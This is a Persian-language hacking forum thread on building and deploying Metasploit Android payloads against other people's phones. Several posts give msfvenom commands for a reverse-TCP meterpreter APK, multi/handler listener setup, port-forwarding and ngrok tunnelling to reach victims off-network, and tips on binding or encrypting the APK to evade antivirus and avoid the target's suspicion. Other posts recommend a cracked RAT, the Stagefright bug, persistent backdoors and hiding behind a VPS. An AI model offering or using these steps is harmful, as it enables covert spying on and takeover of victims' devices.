رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

هک اندروید با متاسپلویت


Sina_master

پست های پیشنهاد شده

سلام

من تزمینالو باز میکنم  این دستورو میزنم ارور میده

میشه بگید مشکل از کجاس؟

This is the hidden content, please
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


 

سلام

من تزمینالو باز میکنم  این دستورو میزنم ارور میده

میشه بگید مشکل از کجاس؟

This is the hidden content, please

اگه از کالی 2 استفاده میکنید به احتمال زیاد مشکل از متاسپلویتتونه چون توی کالی 2 یکم مشکل داره اروری که میده رو قرار بده تا اگه لازم بود آموزش درست کردنش رو بذارم ...

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


 

سلام

من تزمینالو باز میکنم  این دستورو میزنم ارور میده

میشه بگید مشکل از کجاس؟

This is the hidden content, please

 

دوست عزیز سلام

الان چند وقتی هست که این روش منسوخ شده و به جای msf payload باید از روش msfvenom استفاده کنید.

از دوستان خواهش مندم روش venom رو آموزش بدن.

 

msfvenom -p android/meterpreter/reverse_tcp LHOST= {YOUR IP} LPORT=4444 R > /root/esme barnameh.apk

 

مشکلی که با با این روش هست اینه که نمیتونید به گوشی کسی که از وای فای یا شبکه شما خارجه  دسترسی بگیرید.

به نظر بنده رات ها بهترند البته مشکل اصلی با رات و این روش این هست که نمیشه برنامه apk ساخته شده رو طوری بایند کرد که کسی متوجه نشه.

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


دوست عزیز سلام

الان چند وقتی هست که این روش منسوخ شده و به جای msf payload باید از روش msfvenom استفاده کنید.

از دوستان خواهش مندم روش venom رو آموزش بدن.

 

msfvenom -p android/meterpreter/reverse_tcp LHOST= {YOUR IP} LPORT=4444 R > /root/esme barnameh.apk

 

مشکلی که با با این روش هست اینه که نمیتونید به گوشی کسی که از وای فای یا شبکه شما خارجه  دسترسی بگیرید.

به نظر بنده رات ها بهترند البته مشکل اصلی با رات و این روش این هست که نمیشه برنامه apk ساخته شده رو طوری بایند کرد که کسی متوجه نشه.

بله من از کالی ۲ استفاده میکنم

فایلو با این روش ساختم مرسی

ولی من اگه بخوام روی گوشی خودم تستش کنم و خارج از شبکه وایفای باشه جواب نمیده؟

الان با این فایل میتونم چیکار کنم؟

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


بله من از کالی ۲ استفاده میکنم

فایلو با این روش ساختم مرسی

ولی من اگه بخوام روی گوشی خودم تستش کنم و خارج از شبکه وایفای باشه جواب نمیده؟

الان با این فایل میتونم چیکار کنم؟

 

 

 

سلام

از باگ stagefright استفاده کنید

 

تو سایتای خارجی بگردی پیدا میکنی

فقط با دادن ی فیلم میتونی هکش کنی

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


با ارسال mms شبکه های مخابراتی هم راحت میتونستن کنترل کنند و بفهمن که فایل شما مخرب هست و میخواید جاسوسی گوشی انجام بدید
این درسته؟

آموزش فارسیشو نداره این انجمن؟
 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


دوست عزیز سلام

الان چند وقتی هست که این روش منسوخ شده و به جای msf payload باید از روش msfvenom استفاده کنید.

از دوستان خواهش مندم روش venom رو آموزش بدن.

 

msfvenom -p android/meterpreter/reverse_tcp LHOST= {YOUR IP} LPORT=4444 R > /root/esme barnameh.apk

 

مشکلی که با با این روش هست اینه که نمیتونید به گوشی کسی که از وای فای یا شبکه شما خارجه  دسترسی بگیرید.

به نظر بنده رات ها بهترند البته مشکل اصلی با رات و این روش این هست که نمیشه برنامه apk ساخته شده رو طوری بایند کرد که کسی متوجه نشه.

سلام

شما گفتید که مشکل این روش اینه که نمیشه به گوشی کسی که از وای فای یا شبکه شما خارجه دسترسی بگیرید ولی من کاملا این حرف شما رو رد میکنم

چون خود من تونستم دسترسی بگیریم با کسی که خارج از شبکه وای فای و در شهر دیگه ای هستش

This is the hidden content, please
/emoticons/smile@2x.png 2x" width="20" height="20" />

تنها مشکلی که هست اینه که نمیشه فایل apk ساخته شده رو بایند کرد یا کریپتش کرد ... (البته برای مخفی کردن کد توی یه برنامه دیگه یه راهی هست که اموزش هاش محدوده که خود من هم متوجه نشدم)

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


بله من از کالی ۲ استفاده میکنم

فایلو با این روش ساختم مرسی

ولی من اگه بخوام روی گوشی خودم تستش کنم و خارج از شبکه وایفای باشه جواب نمیده؟

الان با این فایل میتونم چیکار کنم؟

دادا شما باید پورتی که نیازه رو داخل کالی باز کنی مثلا پورت 4444

اول از همه gufw رو با دستور apt-get install gufw نصب کن بعد با دستور gufw فایروال رو باز کن و unlock رو بزن و فایروال رو روی حالت خاموش قرار بده  حالا برو تنظیمات مودم قسمت Nat و در نهایت پورت فورواردینگ و پورت های 80 و 443 و 4444 رو بازکن (TCP&UDP) خب حالا برو این

This is the hidden content, please
و پورت 4444 رو چک کن میبینی که نوشته این پورت بسته هست .

ترمینال رو باز کن و دستور msfconsole رو برای باز کردن متاسپلویت وارد کن(میتونی از منوی سمت چپ استفاده کنی) حالا دستور use multi/handler رو وارد کن بعد دستور set lhost ip (آی پی رو همون آی پی بده که توی اون سایته برا چک کردن پورتت نوشته شده منظورم ای پی عمومیت هستش)و بعد اون set lport 4444 رو وارد کن حالا برو این

This is the hidden content, please
و پورت 4444 رو چک کن میبینی که نوشته بازه ، برای استفاده از پی لودی که ساختی به جای دستور use multi/handler از دستور use exploit/multi/handler و بعد اون set payload android/meterpreter/reverse_tcp بقیشم که آی پی و پورت رو ست میکنی بعدش میتونی دسترسی بگیری از شبکه خارج از وای فای

اگه نیاز داشتی یه فیلم میگیرم نشونت میدم

This is the hidden content, please
/emoticons/smile@2x.png 2x" width="20" height="20" />

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


 

سلام

من تزمینالو باز میکنم  این دستورو میزنم ارور میده

میشه بگید مشکل از کجاس؟

This is the hidden content, please

شما اکسپلویتتون رو مشخص نکردید .

از اکسپلویت مولتی هندلر استفاده کنید .

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


سلام

وقتی با این برنامه ساخته شد باید چطوری مدیریت بشه یعنی run بشه با msfconsole باید ران بشه؟

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


دوست عزیز اول کنسول رو باز کن :

msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

[set lport [xxx

  [set lhost [xxx.xxx.xxx.xxx

generate -t raw xxxx.apk

 

اونا که xxx گذاشتم دلخواهن

این ساده ترین راه استفاده از این اکسپلویتا

نیازی هم به نسخه های دیگه نیست فقط با کنسول

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


آقا یه سوال این فایل رو (هر فایلی که مثل رات عمل کنه و نیاز به نصب قربانی داشته باشه "msfpayload-androrat") میشه تویه یک ای پی کای دیگه مخفی کرد یا نه اگه میشه چجوری ممنون میشم بگین

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


آقا یه سوال این فایل رو (هر فایلی که مثل رات عمل کنه و نیاز به نصب قربانی داشته باشه "msfpayload-androrat") میشه تویه یک ای پی کای دیگه مخفی کرد یا نه اگه میشه چجوری ممنون میشم بگین

سلام باید فایل rat را بایند بکنی با یه نرم افزار دیگه

میتونی از نرم افزار اندروید بیندر استفاده کنی

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


  • 4 هفته بعد...

 

سلام

من تزمینالو باز میکنم  این دستورو میزنم ارور میده

میشه بگید مشکل از کجاس؟

This is the hidden content, please

سلام و دورد

اولان شما باید یه ای پی مشخص داشته باشید این ای پی شما ماله شبکه تونه ... دومن هیچ وقت با ای پی خودتون این کار رو نکن همیشه از یه vps  استفاده کن

سومن .. نرم افزار های خیلی زیادی واسه بایند کردن وجود داره که باید بگردی و ازشون استفاده کنی تا ببینی کدومش خوبه و به درد شما میخوره ..

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


سلام خدمت دوستان عزیز

من خیلی راحت با دستور msfvenom گوشی اندروید رو هک میکنم

ولی دو تا سوال داشتم از خدمت اساتید عزیز

1- چطور میتونم بک دور ایجاد کنم تا همیشه به قربانی دسترسی داشه باشم

2- بعد این که قربانی فایل رو باز میکنه بعضی موقع ها سریع die  میشه یعنی سیزن بسته میشه

این قطع شدن از قربانی میتونه مشکلش از چی باشه

ایا از پورت هست ،،، ولی اگر از پورت باشه که اصلا از اون اول نباید عمل کنه 

ممنون

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


  • 5 سال بعد...

سلام من برای تست نفوذ به اندروید دستورات لازم رو میزنم 

و در اخر exploit رو میزنم تا لینک شروع کنه به کار ای پی کالی لینوکس خودم رو میزنم و اخرش / اسم فایل رو میزنم در گوشی خودم اما لینک باز نمیشه میشه بگید مشکل کجاس؟ 

ممنون 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


در در 29 بهمن 1394 در 15:57، Sina_master گفته است :

سلام

من تزمینالو باز میکنم  این دستورو میزنم ارور میده

میشه بگید مشکل از کجاس؟

This is the hidden content, please

سلام دوست عزیز 

اولا  بگم خدمتتون که خیلی بهتره از رات ها استفاده کنین چون هم محیط گرافیکی دارن هم امکانات بیشتری دارن هم کار باهاشون راحت تره... واس همینم یکی از بهترین رات های اندروید رو همینجا اپلود میکنم تا اگه سیستم ویندوزی دارین اگه خواستین ازش استفاده کنین (  اسپای نوت

This is the hidden content, please
کرک شده هستش خودمم تست کردم هیچ مشکلی نداره ولی باید جاوا رو نصب کرده باشید)

 

درباره اتصالات بین رات یا اصن پیلود msfvenome فرقی نمیکنه برای ایجاد این اتصالات من از ngrok استفاده میکنم چون راحت ترین راهه

 میتونین تو نت درباره نصبش سرچ کنین

من اینجا با این دستور از ngrok استفاده میکنم:

 

 

ngrok tcp 4444

 

 

اگه میخواین با متاسپلویت پیش برین با این دستورات:

 

msfvenom -p android/meterpreter/reverse_tcp LHOST=  [your ip or ngrok ] LPORT= [ngrok gives you port] R > /root/Desktop/yourpayload.apk

 

 

خب اینجا پیلودتون رو ساختین 

الان اینو میتونین انکریپت کنین [تا توسط انتی ویروس شناسایی نشه] یا بایندش کنی به یه برنامه [اون برنامه حتما باید apk باشه ] تا هدفتون شک نکنه

 

 

حالا این رو بفرستین به هدفتون و مطمین شین نصب کرده 

حالا نیاز دارید تا msfconsole رو باز کنین و با استفاده ازاون از تارگتتون دسترسی بگیرین

 

برای این کار با دستورات زیر پیش میریم :

 

 

msfcosole

 

set PAYLOAD android/meterpreter/reverse_tcp 

 

set LHOST 0.0.0.0   

 

set LPORT 4444

 

exploit 

 

تمام شد! 

فقط یه نقطه رو بگم... اگه از ngrok استفاده کنین هدفتون وقتی برنلمه رو نصب کرد باید وی...پی انش روشن باشه

 

 

This is the hidden content, please
This is the hidden content, please

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


سلام تمام دستورات msfvenom رو میزنم 

در اخر فایل apk رو نصب میکنم روی گوشیم. دستور exploit رو در کالی میزنم اما شناسایی نمیکنه که فایل نصب شده و اماده هس 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

  تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

×
×
  • ایجاد مورد جدید...